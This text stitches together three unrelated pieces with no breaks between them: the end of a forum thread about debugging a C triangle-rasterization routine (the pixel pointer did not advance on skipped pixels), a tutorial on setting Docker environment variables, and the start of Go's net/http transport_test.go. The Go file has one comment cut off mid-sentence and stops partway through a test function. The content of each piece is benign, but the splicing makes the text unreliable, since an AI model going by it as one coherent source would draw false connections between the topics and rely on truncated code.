    float dot00 = Dot(temp0, temp0);
    float dot01 = Dot(temp0, temp1);
    float dot02 = Dot(temp0, temp2);
    float dot11 = Dot(temp1, temp1);
    float dot12 = Dot(temp1, temp2);
    // Barycentric coordinates (u, v) of p relative to the triangle.
    float inv = 1 / (dot00 * dot11 - dot01 * dot01);
    float u = (dot11 * dot02 - dot01 * dot12) * inv;
    float v = (dot00 * dot12 - dot01 * dot02) * inv;
    // Inside only if both coordinates are non-negative and their sum is below 1.
    result = (u >= 0) && (v >= 0) && (u + v < 1);
    return result;
}
and then the triangle rendering function that writes the pixel data to the pixel buffer
local void
TestRender(Game_Screen_Buffer *buffer, v2 p0, v2 p1, v2 p2,
           uint8 r, uint8 g, uint8 b, uint8 a = 255)
{
    float inner_min_x = Min(p0.x, p1.x);
    float inner_max_x = Max(p0.x, p1.x);
    float inner_min_y = Min(p0.y, p1.y);
    float inner_max_y = Max(p0.y, p1.y);
    float min_x = Min(inner_min_x, p2.x);
    float max_x = Max(inner_max_x, p2.x);
    float min_y = Min(inner_min_y, p2.y);
    float max_y = Max(inner_max_y, p2.y);
    if(min_x < 0.0f)
    {
        min_x = 0.0f;
    }
    if(min_y < 0.0f)
    {
        min_y = 0.0f;
    }
    if(max_x > buffer->width)
    {
        max_x = (float)buffer->width;
    }
    if(max_y > buffer->height)
    {
        max_y = (float)buffer->height;
    }
#if 1
    Rectangle(buffer, (int32)p0.x - 3, (int32)p0.y - 3, 6, 6, 255, 0, 255);
    Rectangle(buffer, (int32)p1.x - 3, (int32)p1.y - 3, 6, 6, 255, 0, 255);
    Rectangle(buffer, (int32)p2.x - 3, (int32)p2.y - 3, 6, 6, 255, 0, 255);
#else
    Rectangle(buffer, (int32)min_x - 3, (int32)min_y - 3, 6, 6, 255, 255, 0);
    Rectangle(buffer, (int32)min_x - 3, (int32)max_y - 3, 6, 6, 255, 255, 0);
    Rectangle(buffer, (int32)max_x - 3, (int32)min_y - 3, 6, 6, 255, 255, 0);
    Rectangle(buffer, (int32)max_x - 3, (int32)max_y - 3, 6, 6, 255, 255, 0);
#endif
    uint32 blue = (uint32)b;
    uint32 green = (uint32)g;
    uint32 red = (uint32)r;
    uint32 alpha = (uint32)a;
    uint32 color = ((alpha << 24) | (red << 16) | (green << 8) | blue);
    uint8 *pitch = ((uint8 *)buffer->memory +
                    (int32)min_x * buffer->bytes_per_pixel +
                    (int32)min_y * buffer->pitch);
    for(float y = min_y;
        y < max_y;
        ++y)
    {
        uint32 *pixel = (uint32 *)pitch;
        for(float x = min_x;
            x < max_x;
            ++x)
        {
            if(IsInTriangle(V2(x, y), p0, p1, p2))
            {
                *pixel++ = color;
            }
        }
        pitch += buffer->pitch;
    }
}
I'm not really sure what's going on, honestly. I think I might have screwed up the dot products somehow, but they all look okay to me, though any method that's worked produces the same problem, so maybe it has to do with getting pixels in the pixel buffer?
Jesse Coyle
37 posts
Using vectors to create triangles
Oh sweet taco bell geezus... Screw it everyone! It was the pixel buffer...
changed
for(float y = min_y;
    y < max_y;
    ++y)
{
    uint32 *pixel = (uint32 *)pitch;
    for(float x = min_x;
        x < max_x;
        ++x)
    {
        if(IsInTriangle(V2(x, y), p0, p1, p2))
        {
            *pixel++ = color;
        }
    }
    pitch += buffer->pitch;
}
to
for(float y = min_y;
    y < max_y;
    ++y)
{
    uint32 *pixel = (uint32 *)pitch;
    for(float x = min_x;
        x < max_x;
        ++x)
    {
        if(IsInTriangle(V2(x, y), p0, p1, p2))
        {
            *pixel++ = color;
        }
        else
        {
            *pixel++;
        }
    }
    pitch += buffer->pitch;
}
Forgot that if the condition fails you still have to move along the columns. I guess all I needed was a wookie to talk to.
[attachment=44]triangles_solution.png[/attachment]
There goes 5 hours of my life...
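For what it's worth, the same fix reads a little cleaner if the pointer is advanced in the loop statement itself, so no empty else branch is needed (just a sketch, same behavior):

for(float y = min_y;
    y < max_y;
    ++y)
{
    uint32 *pixel = (uint32 *)pitch;
    for(float x = min_x;
        x < max_x;
        ++x, ++pixel)   // advance every column, whether or not we draw
    {
        if(IsInTriangle(V2(x, y), p0, p1, p2))
        {
            *pixel = color;
        }
    }
    pitch += buffer->pitch;
}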
Andrew Bromage
183 posts / 1 project
Research engineer, resident maths nerd (Erdős number 3).
Using vectors to create triangles
Zilarrezko
I guess all I needed was a wookie to talk to.
I'm going to quote from The Practice of Programming by Kernighan and Pike. (C and Go, what a combination.)
On fixing bugs:
[An] effective technique is to explain your code to someone else. This will often cause you to explain the bug to yourself. Sometimes it takes no more than a few sentences, followed by an embarrassed “Never mind; I see what’s wrong. Sorry to bother you.” This works remarkably well; you can even use non-programmers as listeners. One university computer center kept a teddy bear near the help desk. Students with mysterious bugs were required to explain them to the teddy bear before they could speak to a human counsellor.
Many professional programmers keep some kind of toy at their desk for precisely this purpose. I have a Toy Story three-eyed alien. Anyone who has watched Chronaldragon's stream has seen his dragon. Casey, of course, doesn't need one for HMH, because he's explaining everything to the audience.
Jesse Coyle
37 posts
Using vectors to create triangles
I've heard ducks. But I thought the google wookie was the most famous one.
I bet sometimes when Casey is coding on his own and runs into a bug, instead of talking to his owl he acts as if he's explaining to Windows devs how his code works and why it is better than what Windows devs would have come up with, or just companies in general.
Docker
How to Set Environment Variables in Docker
Environment variables specify important configuration settings. Docker environment variables let us pass additional configuration to a Docker container when deploying Docker applications: for example, the “USER” variable can specify a username, the “PASSWORD” variable can set a password on the application or container, and “DOCKER_HOST” can define a remote host.
This blog will demonstrate how to set environment variables in Docker using:
• a Dockerfile
• the “docker run” command
• a Docker Compose file
Method 1: Set Environment Variable Through Dockerfile
A Dockerfile is a file that defines the instructions to build a container’s snapshot, also known as a Docker image. In a Dockerfile, users can set environment variables using the “ENV” instruction. For illustration, go through the listed steps.
Step 1: Create Dockerfile
First, create a file named “Dockerfile” and add the given code to it:
FROM python
WORKDIR /app
COPY . /app
ENV USER="Docker-User"
CMD ["python", "app.py"]
The above snippet contains the following instructions:
• “FROM” defines the Docker base image.
• “WORKDIR” specifies the container’s working directory.
• “COPY” copies the build content into the container’s defined path.
• “ENV” sets environment variables for the container. For demonstration, we have set the “USER” environment variable.
• “CMD” defines the container’s executables.
Step 2: Make Python File
Next, create the Python file “app.py” that will print the environment variable set in the Dockerfile:
import os
user = os.environ.get("USER")
print(user)
Step 3: Make Docker Image
Generate a new Docker image/snapshot from the Dockerfile instructions with the given command:
docker build -t python-img .
Step 4: Run Docker Container
Next, run the Docker container from the image using the mentioned command:
docker run python-img
The output shows the value of the “USER” environment variable (here, “Docker-User”).
Method 2: Set Environment Variable Through Command
Users can also set the environment variables while creating and executing the container through the “-e” option in Docker “run” command.
For this purpose, use “docker run -e <Variable= “Value”> <image-name>” command as mentioned below:
docker run --rm -e USER="Linuxhint" python-img
In the above command, we have set the “USER” environment variable.
The above output indicates that we have successfully set the “USER” environment variable as “Linuxhint”.
Method 3: Set Environment Variable Through Compose File
Users can also configure Docker environment variables through Docker Compose. To do so, simply provide the environment variable under the Docker Compose “environment” key in the “docker-compose.yml” file.
For implementation, follow the provided procedure.
Step 1: Create Compose File
First, create the “docker-compose.yml” file and add the below given configurations to the file:
version: '3'
services:
  py-app:
    build: .
    environment:
      - USER=Linuxhint
In the above code block:
• “services” defines the compose services.
• “build” provides the build context. For instance, we are using a Dockerfile placed in the current directory.
• The “environment” key sets the environment variable for the compose service or container.
Step 2: Fire Up the Container
Next, fire up the compose service in a container using the “docker-compose up” command:
docker-compose up
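To verify the variable from inside the service, one option (a sketch; “py-app” is the service name defined above) is to run a one-off container and print it:

# print the variable from inside a one-off container for the py-app service
docker-compose run --rm py-app python -c "import os; print(os.environ.get('USER'))"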
That’s all about setting up an environment variable in Docker.
Conclusion
To set an environment variable in Docker, users can use the “ENV” instruction in a Dockerfile or the “environment” key in Docker Compose. Docker users can also set an environment variable while creating and executing a container through the “docker run -e <Variable>="<Value>" <image-name>” command. This post has provided the methods to set environment variables in Docker.
Source file src/net/http/transport_test.go
Documentation: net/http
1 // Copyright 2011 The Go Authors. All rights reserved.
2 // Use of this source code is governed by a BSD-style
3 // license that can be found in the LICENSE file.
4
5 // Tests for transport.go.
6 //
7 // More tests are in clientserver_test.go (for things testing both client & server for both
8 // HTTP/1 and HTTP/2). This
9
10 package http_test
11
12 import (
13 "bufio"
14 "bytes"
15 "compress/gzip"
16 "context"
17 "crypto/rand"
18 "crypto/tls"
19 "crypto/x509"
20 "encoding/binary"
21 "errors"
22 "fmt"
23 "internal/nettrace"
24 "io"
25 "io/ioutil"
26 "log"
27 "net"
28 . "net/http"
29 "net/http/httptest"
30 "net/http/httptrace"
31 "net/http/httputil"
32 "net/http/internal"
33 "net/textproto"
34 "net/url"
35 "os"
36 "reflect"
37 "runtime"
38 "strconv"
39 "strings"
40 "sync"
41 "sync/atomic"
42 "testing"
43 "time"
44
45 "internal/x/net/http/httpguts"
46 )
47
48 // TODO: test 5 pipelined requests with responses: 1) OK, 2) OK, Connection: Close
49 // and then verify that the final 2 responses get errors back.
50
51 // hostPortHandler writes back the client's "host:port".
52 var hostPortHandler = HandlerFunc(func(w ResponseWriter, r *Request) {
53 if r.FormValue("close") == "true" {
54 w.Header().Set("Connection", "close")
55 }
56 w.Header().Set("X-Saw-Close", fmt.Sprint(r.Close))
57 w.Write([]byte(r.RemoteAddr))
58 })
59
60 // testCloseConn is a net.Conn tracked by a testConnSet.
61 type testCloseConn struct {
62 net.Conn
63 set *testConnSet
64 }
65
66 func (c *testCloseConn) Close() error {
67 c.set.remove(c)
68 return c.Conn.Close()
69 }
70
71 // testConnSet tracks a set of TCP connections and whether they've
72 // been closed.
73 type testConnSet struct {
74 t *testing.T
75 mu sync.Mutex // guards closed and list
76 closed map[net.Conn]bool
77 list []net.Conn // in order created
78 }
79
80 func (tcs *testConnSet) insert(c net.Conn) {
81 tcs.mu.Lock()
82 defer tcs.mu.Unlock()
83 tcs.closed[c] = false
84 tcs.list = append(tcs.list, c)
85 }
86
87 func (tcs *testConnSet) remove(c net.Conn) {
88 tcs.mu.Lock()
89 defer tcs.mu.Unlock()
90 tcs.closed[c] = true
91 }
92
93 // some tests use this to manage raw tcp connections for later inspection
94 func makeTestDial(t *testing.T) (*testConnSet, func(n, addr string) (net.Conn, error)) {
95 connSet := &testConnSet{
96 t: t,
97 closed: make(map[net.Conn]bool),
98 }
99 dial := func(n, addr string) (net.Conn, error) {
100 c, err := net.Dial(n, addr)
101 if err != nil {
102 return nil, err
103 }
104 tc := &testCloseConn{c, connSet}
105 connSet.insert(tc)
106 return tc, nil
107 }
108 return connSet, dial
109 }
110
111 func (tcs *testConnSet) check(t *testing.T) {
112 tcs.mu.Lock()
113 defer tcs.mu.Unlock()
114 for i := 4; i >= 0; i-- {
115 for i, c := range tcs.list {
116 if tcs.closed[c] {
117 continue
118 }
119 if i != 0 {
120 tcs.mu.Unlock()
121 time.Sleep(50 * time.Millisecond)
122 tcs.mu.Lock()
123 continue
124 }
125 t.Errorf("TCP connection #%d, %p (of %d total) was not closed", i+1, c, len(tcs.list))
126 }
127 }
128 }
129
130 func TestReuseRequest(t *testing.T) {
131 defer afterTest(t)
132 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
133 w.Write([]byte("{}"))
134 }))
135 defer ts.Close()
136
137 c := ts.Client()
138 req, _ := NewRequest("GET", ts.URL, nil)
139 res, err := c.Do(req)
140 if err != nil {
141 t.Fatal(err)
142 }
143 err = res.Body.Close()
144 if err != nil {
145 t.Fatal(err)
146 }
147
148 res, err = c.Do(req)
149 if err != nil {
150 t.Fatal(err)
151 }
152 err = res.Body.Close()
153 if err != nil {
154 t.Fatal(err)
155 }
156 }
157
158 // Two subsequent requests and verify their response is the same.
159 // The response from the server is our own IP:port
160 func TestTransportKeepAlives(t *testing.T) {
161 defer afterTest(t)
162 ts := httptest.NewServer(hostPortHandler)
163 defer ts.Close()
164
165 c := ts.Client()
166 for _, disableKeepAlive := range []bool{false, true} {
167 c.Transport.(*Transport).DisableKeepAlives = disableKeepAlive
168 fetch := func(n int) string {
169 res, err := c.Get(ts.URL)
170 if err != nil {
171 t.Fatalf("error in disableKeepAlive=%v, req #%d, GET: %v", disableKeepAlive, n, err)
172 }
173 body, err := ioutil.ReadAll(res.Body)
174 if err != nil {
175 t.Fatalf("error in disableKeepAlive=%v, req #%d, ReadAll: %v", disableKeepAlive, n, err)
176 }
177 return string(body)
178 }
179
180 body1 := fetch(1)
181 body2 := fetch(2)
182
183 bodiesDiffer := body1 != body2
184 if bodiesDiffer != disableKeepAlive {
185 t.Errorf("error in disableKeepAlive=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
186 disableKeepAlive, bodiesDiffer, body1, body2)
187 }
188 }
189 }
190
191 func TestTransportConnectionCloseOnResponse(t *testing.T) {
192 defer afterTest(t)
193 ts := httptest.NewServer(hostPortHandler)
194 defer ts.Close()
195
196 connSet, testDial := makeTestDial(t)
197
198 c := ts.Client()
199 tr := c.Transport.(*Transport)
200 tr.Dial = testDial
201
202 for _, connectionClose := range []bool{false, true} {
203 fetch := func(n int) string {
204 req := new(Request)
205 var err error
206 req.URL, err = url.Parse(ts.URL + fmt.Sprintf("/?close=%v", connectionClose))
207 if err != nil {
208 t.Fatalf("URL parse error: %v", err)
209 }
210 req.Method = "GET"
211 req.Proto = "HTTP/1.1"
212 req.ProtoMajor = 1
213 req.ProtoMinor = 1
214
215 res, err := c.Do(req)
216 if err != nil {
217 t.Fatalf("error in connectionClose=%v, req #%d, Do: %v", connectionClose, n, err)
218 }
219 defer res.Body.Close()
220 body, err := ioutil.ReadAll(res.Body)
221 if err != nil {
222 t.Fatalf("error in connectionClose=%v, req #%d, ReadAll: %v", connectionClose, n, err)
223 }
224 return string(body)
225 }
226
227 body1 := fetch(1)
228 body2 := fetch(2)
229 bodiesDiffer := body1 != body2
230 if bodiesDiffer != connectionClose {
231 t.Errorf("error in connectionClose=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
232 connectionClose, bodiesDiffer, body1, body2)
233 }
234
235 tr.CloseIdleConnections()
236 }
237
238 connSet.check(t)
239 }
240
241 func TestTransportConnectionCloseOnRequest(t *testing.T) {
242 defer afterTest(t)
243 ts := httptest.NewServer(hostPortHandler)
244 defer ts.Close()
245
246 connSet, testDial := makeTestDial(t)
247
248 c := ts.Client()
249 tr := c.Transport.(*Transport)
250 tr.Dial = testDial
251 for _, connectionClose := range []bool{false, true} {
252 fetch := func(n int) string {
253 req := new(Request)
254 var err error
255 req.URL, err = url.Parse(ts.URL)
256 if err != nil {
257 t.Fatalf("URL parse error: %v", err)
258 }
259 req.Method = "GET"
260 req.Proto = "HTTP/1.1"
261 req.ProtoMajor = 1
262 req.ProtoMinor = 1
263 req.Close = connectionClose
264
265 res, err := c.Do(req)
266 if err != nil {
267 t.Fatalf("error in connectionClose=%v, req #%d, Do: %v", connectionClose, n, err)
268 }
269 if got, want := res.Header.Get("X-Saw-Close"), fmt.Sprint(connectionClose); got != want {
270 t.Errorf("For connectionClose = %v; handler's X-Saw-Close was %v; want %v",
271 connectionClose, got, !connectionClose)
272 }
273 body, err := ioutil.ReadAll(res.Body)
274 if err != nil {
275 t.Fatalf("error in connectionClose=%v, req #%d, ReadAll: %v", connectionClose, n, err)
276 }
277 return string(body)
278 }
279
280 body1 := fetch(1)
281 body2 := fetch(2)
282 bodiesDiffer := body1 != body2
283 if bodiesDiffer != connectionClose {
284 t.Errorf("error in connectionClose=%v. unexpected bodiesDiffer=%v; body1=%q; body2=%q",
285 connectionClose, bodiesDiffer, body1, body2)
286 }
287
288 tr.CloseIdleConnections()
289 }
290
291 connSet.check(t)
292 }
293
294 // if the Transport's DisableKeepAlives is set, all requests should
295 // send Connection: close.
296 // HTTP/1-only (Connection: close doesn't exist in h2)
297 func TestTransportConnectionCloseOnRequestDisableKeepAlive(t *testing.T) {
298 defer afterTest(t)
299 ts := httptest.NewServer(hostPortHandler)
300 defer ts.Close()
301
302 c := ts.Client()
303 c.Transport.(*Transport).DisableKeepAlives = true
304
305 res, err := c.Get(ts.URL)
306 if err != nil {
307 t.Fatal(err)
308 }
309 res.Body.Close()
310 if res.Header.Get("X-Saw-Close") != "true" {
311 t.Errorf("handler didn't see Connection: close ")
312 }
313 }
314
315 // Test that Transport only sends one "Connection: close", regardless of
316 // how "close" was indicated.
317 func TestTransportRespectRequestWantsClose(t *testing.T) {
318 tests := []struct {
319 disableKeepAlives bool
320 close bool
321 }{
322 {disableKeepAlives: false, close: false},
323 {disableKeepAlives: false, close: true},
324 {disableKeepAlives: true, close: false},
325 {disableKeepAlives: true, close: true},
326 }
327
328 for _, tc := range tests {
329 t.Run(fmt.Sprintf("DisableKeepAlive=%v,RequestClose=%v", tc.disableKeepAlives, tc.close),
330 func(t *testing.T) {
331 defer afterTest(t)
332 ts := httptest.NewServer(hostPortHandler)
333 defer ts.Close()
334
335 c := ts.Client()
336 c.Transport.(*Transport).DisableKeepAlives = tc.disableKeepAlives
337 req, err := NewRequest("GET", ts.URL, nil)
338 if err != nil {
339 t.Fatal(err)
340 }
341 count := 0
342 trace := &httptrace.ClientTrace{
343 WroteHeaderField: func(key string, field []string) {
344 if key != "Connection" {
345 return
346 }
347 if httpguts.HeaderValuesContainsToken(field, "close") {
348 count += 1
349 }
350 },
351 }
352 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
353 req.Close = tc.close
354 res, err := c.Do(req)
355 if err != nil {
356 t.Fatal(err)
357 }
358 defer res.Body.Close()
359 if want := tc.disableKeepAlives || tc.close; count > 1 || (count == 1) != want {
360 t.Errorf("expecting want:%v, got 'Connection: close':%d", want, count)
361 }
362 })
363 }
364
365 }
366
367 func TestTransportIdleCacheKeys(t *testing.T) {
368 defer afterTest(t)
369 ts := httptest.NewServer(hostPortHandler)
370 defer ts.Close()
371 c := ts.Client()
372 tr := c.Transport.(*Transport)
373
374 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
375 t.Errorf("After CloseIdleConnections expected %d idle conn cache keys; got %d", e, g)
376 }
377
378 resp, err := c.Get(ts.URL)
379 if err != nil {
380 t.Error(err)
381 }
382 ioutil.ReadAll(resp.Body)
383
384 keys := tr.IdleConnKeysForTesting()
385 if e, g := 1, len(keys); e != g {
386 t.Fatalf("After Get expected %d idle conn cache keys; got %d", e, g)
387 }
388
389 if e := "|http|" + ts.Listener.Addr().String(); keys[0] != e {
390 t.Errorf("Expected idle cache key %q; got %q", e, keys[0])
391 }
392
393 tr.CloseIdleConnections()
394 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
395 t.Errorf("After CloseIdleConnections expected %d idle conn cache keys; got %d", e, g)
396 }
397 }
398
399 // Tests that the HTTP transport re-uses connections when a client
400 // reads to the end of a response Body without closing it.
401 func TestTransportReadToEndReusesConn(t *testing.T) {
402 defer afterTest(t)
403 const msg = "foobar"
404
405 var addrSeen map[string]int
406 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
407 addrSeen[r.RemoteAddr]++
408 if r.URL.Path == "/chunked/" {
409 w.WriteHeader(200)
410 w.(Flusher).Flush()
411 } else {
412 w.Header().Set("Content-Length", strconv.Itoa(len(msg)))
413 w.WriteHeader(200)
414 }
415 w.Write([]byte(msg))
416 }))
417 defer ts.Close()
418
419 buf := make([]byte, len(msg))
420
421 for pi, path := range []string{"/content-length/", "/chunked/"} {
422 wantLen := []int{len(msg), -1}[pi]
423 addrSeen = make(map[string]int)
424 for i := 0; i < 3; i++ {
425 res, err := Get(ts.URL + path)
426 if err != nil {
427 t.Errorf("Get %s: %v", path, err)
428 continue
429 }
430 // We want to close this body eventually (before the
431 // defer afterTest at top runs), but not before the
432 // len(addrSeen) check at the bottom of this test,
433 // since Closing this early in the loop would risk
434 // making connections be re-used for the wrong reason.
435 defer res.Body.Close()
436
437 if res.ContentLength != int64(wantLen) {
438 t.Errorf("%s res.ContentLength = %d; want %d", path, res.ContentLength, wantLen)
439 }
440 n, err := res.Body.Read(buf)
441 if n != len(msg) || err != io.EOF {
442 t.Errorf("%s Read = %v, %v; want %d, EOF", path, n, err, len(msg))
443 }
444 }
445 if len(addrSeen) != 1 {
446 t.Errorf("for %s, server saw %d distinct client addresses; want 1", path, len(addrSeen))
447 }
448 }
449 }
450
451 func TestTransportMaxPerHostIdleConns(t *testing.T) {
452 defer afterTest(t)
453 resch := make(chan string)
454 gotReq := make(chan bool)
455 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
456 gotReq <- true
457 msg := <-resch
458 _, err := w.Write([]byte(msg))
459 if err != nil {
460 t.Fatalf("Write: %v", err)
461 }
462 }))
463 defer ts.Close()
464
465 c := ts.Client()
466 tr := c.Transport.(*Transport)
467 maxIdleConnsPerHost := 2
468 tr.MaxIdleConnsPerHost = maxIdleConnsPerHost
469
470 // Start 3 outstanding requests and wait for the server to get them.
471 // Their responses will hang until we write to resch, though.
472 donech := make(chan bool)
473 doReq := func() {
474 resp, err := c.Get(ts.URL)
475 if err != nil {
476 t.Error(err)
477 return
478 }
479 if _, err := ioutil.ReadAll(resp.Body); err != nil {
480 t.Errorf("ReadAll: %v", err)
481 return
482 }
483 donech <- true
484 }
485 go doReq()
486 <-gotReq
487 go doReq()
488 <-gotReq
489 go doReq()
490 <-gotReq
491
492 if e, g := 0, len(tr.IdleConnKeysForTesting()); e != g {
493 t.Fatalf("Before writes, expected %d idle conn cache keys; got %d", e, g)
494 }
495
496 resch <- "res1"
497 <-donech
498 keys := tr.IdleConnKeysForTesting()
499 if e, g := 1, len(keys); e != g {
500 t.Fatalf("after first response, expected %d idle conn cache keys; got %d", e, g)
501 }
502 addr := ts.Listener.Addr().String()
503 cacheKey := "|http|" + addr
504 if keys[0] != cacheKey {
505 t.Fatalf("Expected idle cache key %q; got %q", cacheKey, keys[0])
506 }
507 if e, g := 1, tr.IdleConnCountForTesting("http", addr); e != g {
508 t.Errorf("after first response, expected %d idle conns; got %d", e, g)
509 }
510
511 resch <- "res2"
512 <-donech
513 if g, w := tr.IdleConnCountForTesting("http", addr), 2; g != w {
514 t.Errorf("after second response, idle conns = %d; want %d", g, w)
515 }
516
517 resch <- "res3"
518 <-donech
519 if g, w := tr.IdleConnCountForTesting("http", addr), maxIdleConnsPerHost; g != w {
520 t.Errorf("after third response, idle conns = %d; want %d", g, w)
521 }
522 }
523
524 func TestTransportMaxConnsPerHostIncludeDialInProgress(t *testing.T) {
525 defer afterTest(t)
526 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
527 _, err := w.Write([]byte("foo"))
528 if err != nil {
529 t.Fatalf("Write: %v", err)
530 }
531 }))
532 defer ts.Close()
533 c := ts.Client()
534 tr := c.Transport.(*Transport)
535 dialStarted := make(chan struct{})
536 stallDial := make(chan struct{})
537 tr.Dial = func(network, addr string) (net.Conn, error) {
538 dialStarted <- struct{}{}
539 <-stallDial
540 return net.Dial(network, addr)
541 }
542
543 tr.DisableKeepAlives = true
544 tr.MaxConnsPerHost = 1
545
546 preDial := make(chan struct{})
547 reqComplete := make(chan struct{})
548 doReq := func(reqId string) {
549 req, _ := NewRequest("GET", ts.URL, nil)
550 trace := &httptrace.ClientTrace{
551 GetConn: func(hostPort string) {
552 preDial <- struct{}{}
553 },
554 }
555 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
556 resp, err := tr.RoundTrip(req)
557 if err != nil {
558 t.Errorf("unexpected error for request %s: %v", reqId, err)
559 }
560 _, err = ioutil.ReadAll(resp.Body)
561 if err != nil {
562 t.Errorf("unexpected error for request %s: %v", reqId, err)
563 }
564 reqComplete <- struct{}{}
565 }
566 // get req1 to dial-in-progress
567 go doReq("req1")
568 <-preDial
569 <-dialStarted
570
571 // get req2 to waiting on conns per host to go down below max
572 go doReq("req2")
573 <-preDial
574 select {
575 case <-dialStarted:
576 t.Error("req2 dial started while req1 dial in progress")
577 return
578 default:
579 }
580
581 // let req1 complete
582 stallDial <- struct{}{}
583 <-reqComplete
584
585 // let req2 complete
586 <-dialStarted
587 stallDial <- struct{}{}
588 <-reqComplete
589 }
590
591 func TestTransportRemovesDeadIdleConnections(t *testing.T) {
592 setParallel(t)
593 defer afterTest(t)
594 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
595 io.WriteString(w, r.RemoteAddr)
596 }))
597 defer ts.Close()
598
599 c := ts.Client()
600 tr := c.Transport.(*Transport)
601
602 doReq := func(name string) string {
603 // Do a POST instead of a GET to prevent the Transport's
604 // idempotent request retry logic from kicking in...
605 res, err := c.Post(ts.URL, "", nil)
606 if err != nil {
607 t.Fatalf("%s: %v", name, err)
608 }
609 if res.StatusCode != 200 {
610 t.Fatalf("%s: %v", name, res.Status)
611 }
612 defer res.Body.Close()
613 slurp, err := ioutil.ReadAll(res.Body)
614 if err != nil {
615 t.Fatalf("%s: %v", name, err)
616 }
617 return string(slurp)
618 }
619
620 first := doReq("first")
621 keys1 := tr.IdleConnKeysForTesting()
622
623 ts.CloseClientConnections()
624
625 var keys2 []string
626 if !waitCondition(3*time.Second, 50*time.Millisecond, func() bool {
627 keys2 = tr.IdleConnKeysForTesting()
628 return len(keys2) == 0
629 }) {
630 t.Fatalf("Transport didn't notice idle connection's death.\nbefore: %q\n after: %q\n", keys1, keys2)
631 }
632
633 second := doReq("second")
634 if first == second {
635 t.Errorf("expected a different connection between requests. got %q both times", first)
636 }
637 }
638
639 func TestTransportServerClosingUnexpectedly(t *testing.T) {
640 setParallel(t)
641 defer afterTest(t)
642 ts := httptest.NewServer(hostPortHandler)
643 defer ts.Close()
644 c := ts.Client()
645
646 fetch := func(n, retries int) string {
647 condFatalf := func(format string, arg ...interface{}) {
648 if retries <= 0 {
649 t.Fatalf(format, arg...)
650 }
651 t.Logf("retrying shortly after expected error: "+format, arg...)
652 time.Sleep(time.Second / time.Duration(retries))
653 }
654 for retries >= 0 {
655 retries--
656 res, err := c.Get(ts.URL)
657 if err != nil {
658 condFatalf("error in req #%d, GET: %v", n, err)
659 continue
660 }
661 body, err := ioutil.ReadAll(res.Body)
662 if err != nil {
663 condFatalf("error in req #%d, ReadAll: %v", n, err)
664 continue
665 }
666 res.Body.Close()
667 return string(body)
668 }
669 panic("unreachable")
670 }
671
672 body1 := fetch(1, 0)
673 body2 := fetch(2, 0)
674
675 ts.CloseClientConnections() // surprise!
676
677 // This test has an expected race. Sleeping for 25 ms prevents
678 // it on most fast machines, causing the next fetch() call to
679 // succeed quickly. But if we do get errors, fetch() will retry 5
680 // times with some delays between.
681 time.Sleep(25 * time.Millisecond)
682
683 body3 := fetch(3, 5)
684
685 if body1 != body2 {
686 t.Errorf("expected body1 and body2 to be equal")
687 }
688 if body2 == body3 {
689 t.Errorf("expected body2 and body3 to be different")
690 }
691 }
692
693 // Test for https://golang.org/issue/2616 (appropriate issue number)
694 // This fails pretty reliably with GOMAXPROCS=100 or something high.
695 func TestStressSurpriseServerCloses(t *testing.T) {
696 defer afterTest(t)
697 if testing.Short() {
698 t.Skip("skipping test in short mode")
699 }
700 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
701 w.Header().Set("Content-Length", "5")
702 w.Header().Set("Content-Type", "text/plain")
703 w.Write([]byte("Hello"))
704 w.(Flusher).Flush()
705 conn, buf, _ := w.(Hijacker).Hijack()
706 buf.Flush()
707 conn.Close()
708 }))
709 defer ts.Close()
710 c := ts.Client()
711
712 // Do a bunch of traffic from different goroutines. Send to activityc
713 // after each request completes, regardless of whether it failed.
714 // If these are too high, OS X exhausts its ephemeral ports
715 // and hangs waiting for them to transition TCP states. That's
716 // not what we want to test. TODO(bradfitz): use an io.Pipe
717 // dialer for this test instead?
718 const (
719 numClients = 20
720 reqsPerClient = 25
721 )
722 activityc := make(chan bool)
723 for i := 0; i < numClients; i++ {
724 go func() {
725 for i := 0; i < reqsPerClient; i++ {
726 res, err := c.Get(ts.URL)
727 if err == nil {
728 // We expect errors since the server is
729 // hanging up on us after telling us to
730 // send more requests, so we don't
731 // actually care what the error is.
732 // But we want to close the body in cases
733 // where we won the race.
734 res.Body.Close()
735 }
736 activityc <- true
737 }
738 }()
739 }
740
741 // Make sure all the request come back, one way or another.
742 for i := 0; i < numClients*reqsPerClient; i++ {
743 select {
744 case <-activityc:
745 case <-time.After(5 * time.Second):
746 t.Fatalf("presumed deadlock; no HTTP client activity seen in awhile")
747 }
748 }
749 }
750
751 // TestTransportHeadResponses verifies that we deal with Content-Lengths
752 // with no bodies properly
753 func TestTransportHeadResponses(t *testing.T) {
754 defer afterTest(t)
755 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
756 if r.Method != "HEAD" {
757 panic("expected HEAD; got " + r.Method)
758 }
759 w.Header().Set("Content-Length", "123")
760 w.WriteHeader(200)
761 }))
762 defer ts.Close()
763 c := ts.Client()
764
765 for i := 0; i < 2; i++ {
766 res, err := c.Head(ts.URL)
767 if err != nil {
768 t.Errorf("error on loop %d: %v", i, err)
769 continue
770 }
771 if e, g := "123", res.Header.Get("Content-Length"); e != g {
772 t.Errorf("loop %d: expected Content-Length header of %q, got %q", i, e, g)
773 }
774 if e, g := int64(123), res.ContentLength; e != g {
775 t.Errorf("loop %d: expected res.ContentLength of %v, got %v", i, e, g)
776 }
777 if all, err := ioutil.ReadAll(res.Body); err != nil {
778 t.Errorf("loop %d: Body ReadAll: %v", i, err)
779 } else if len(all) != 0 {
780 t.Errorf("Bogus body %q", all)
781 }
782 }
783 }
784
785 // TestTransportHeadChunkedResponse verifies that we ignore chunked transfer-encoding
786 // on responses to HEAD requests.
787 func TestTransportHeadChunkedResponse(t *testing.T) {
788 defer afterTest(t)
789 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
